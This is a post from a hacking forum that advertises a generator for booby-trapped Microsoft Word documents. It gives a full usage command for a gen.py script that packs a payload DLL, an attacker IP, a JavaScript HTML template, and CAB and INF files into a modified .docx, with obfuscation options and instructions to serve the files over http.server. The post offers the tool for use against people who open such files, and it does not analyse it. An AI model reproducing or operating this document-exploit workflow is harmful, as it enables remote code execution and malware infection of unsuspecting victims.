The new Vulnerability on microsoft office word file.docx | Hacking Tools | Crax

Welcome To Crax.Pro Forum!

Check our new Marketplace at Crax.Shop

   Login! SignUp Now!

The new Vulnerability on microsoft office word file.docx

The new Vulnerability on microsoft office word file.docx

LV
1
 

0dayhacker

Member
Joined
Jul 8, 2023
Threads
13
Likes
11
Awards
4
Website
crax.pro
Credits
1,440©
Cash
0$

Usage​


Ensure to run setup.sh first as you will need few directories. Once you have run the script, you should be able to run gen.py with the example given:
Code:
# Usage
python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "http://10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3

# Flag
-d -> Our .docx file that already been modified with Bitmap Object whether in header, document or footer
-i -> IP Address
-p -> Payload (.dll)
-t -> HTML File with Javascript
-r -> Rename the output of modified .docx
-c -> Rename the output of patched .cab
-f -> Rename the output of .inf
-obf -> Extra : Comes with 3 mode (HTML Entity, UTF-16BE or Both)
-v -> Increase output verbosity

Notes​


  1. The location of http.server will be in web directory. This directory will have 3 files:-

  • .cab
  • .html
  • .docx
Without verbose

With verbose

boom!...

for better understanding:


----------------------------------------------------------------------------
Link:

Without verbose
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Top Bottom